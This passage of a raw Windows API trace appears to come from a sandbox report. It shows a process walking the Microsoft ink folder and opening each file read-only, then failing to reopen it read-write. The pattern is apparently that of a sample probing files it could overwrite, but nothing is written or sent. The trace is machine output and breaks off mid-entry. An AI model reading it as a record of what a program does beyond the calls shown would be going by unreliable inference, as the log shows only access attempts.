lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 62 [0100.136] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.136] GetLastError () returned 0x5 [0100.136] GetLastError () returned 0x5 [0100.136] SetLastError (dwErrCode=0x5) [0100.136] GetLastError () returned 0x5 [0100.136] SetLastError (dwErrCode=0x5) [0100.136] GetLastError () returned 0x5 [0100.136] SetLastError (dwErrCode=0x5) [0100.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0100.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0100.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.136] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.136] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe46546cb, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe46546cb, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x1ec00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="IpsPlugin.dll", cAlternateFileName="")) returned 1 [0100.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.137] AreFileApisANSI () returned 1 [0100.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll", lpUsedDefaultChar=0x0) returned 65 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0100.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0100.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.138] AreFileApisANSI () returned 1 [0100.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0100.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82dd8 [0100.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x82dd8, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll") returned 65 [0100.138] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.138] GetFileType (hFile=0x368) returned 0x1 [0100.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82dd8 | out: hHeap=0x20000) returned 1 [0100.138] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.138] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.138] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.138] CloseHandle (hObject=0x368) returned 1 [0100.139] AreFileApisANSI () returned 1 [0100.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0100.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82838 [0100.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x82838, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll") returned 65 [0100.139] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.139] GetLastError () returned 0x5 [0100.139] GetLastError () returned 0x5 [0100.139] SetLastError (dwErrCode=0x5) [0100.139] GetLastError () returned 0x5 [0100.139] SetLastError (dwErrCode=0x5) [0100.139] GetLastError () returned 0x5 [0100.139] SetLastError (dwErrCode=0x5) [0100.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82838 | out: hHeap=0x20000) returned 1 [0100.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0100.139] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.139] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.139] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8c6, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsptb.xml", cAlternateFileName="")) returned 1 [0100.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0100.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0100.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0100.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0100.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.140] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.140] AreFileApisANSI () returned 1 [0100.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml", lpUsedDefaultChar=0x0) returned 62 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0100.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.140] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0100.140] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.141] AreFileApisANSI () returned 1 [0100.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.141] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6eb58 [0100.141] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6eb58, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 62 [0100.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.141] GetFileType (hFile=0x368) returned 0x1 [0100.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.141] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.141] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.141] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.141] CloseHandle (hObject=0x368) returned 1 [0100.142] AreFileApisANSI () returned 1 [0100.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6dfa8 [0100.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 62 [0100.142] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.142] GetLastError () returned 0x5 [0100.142] GetLastError () returned 0x5 [0100.142] SetLastError (dwErrCode=0x5) [0100.142] GetLastError () returned 0x5 [0100.142] SetLastError (dwErrCode=0x5) [0100.142] GetLastError () returned 0x5 [0100.142] SetLastError (dwErrCode=0x5) [0100.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0100.142] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.142] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.142] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c940eb6, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7c940eb6, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7c940eb6, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ipsptg.xml", cAlternateFileName="")) returned 1 [0100.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0100.143] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.143] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.143] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.143] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0100.143] AreFileApisANSI () returned 1 [0100.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml", lpUsedDefaultChar=0x0) returned 62 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0100.143] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.143] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.143] AreFileApisANSI () returned 1 [0100.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ea48 [0100.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6ea48, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 62 [0100.144] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.144] GetFileType (hFile=0x368) returned 0x1 [0100.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.144] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.144] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.144] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.144] CloseHandle (hObject=0x368) returned 1 [0100.145] AreFileApisANSI () returned 1 [0100.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0100.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 62 [0100.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.145] GetLastError () returned 0x5 [0100.145] GetLastError () returned 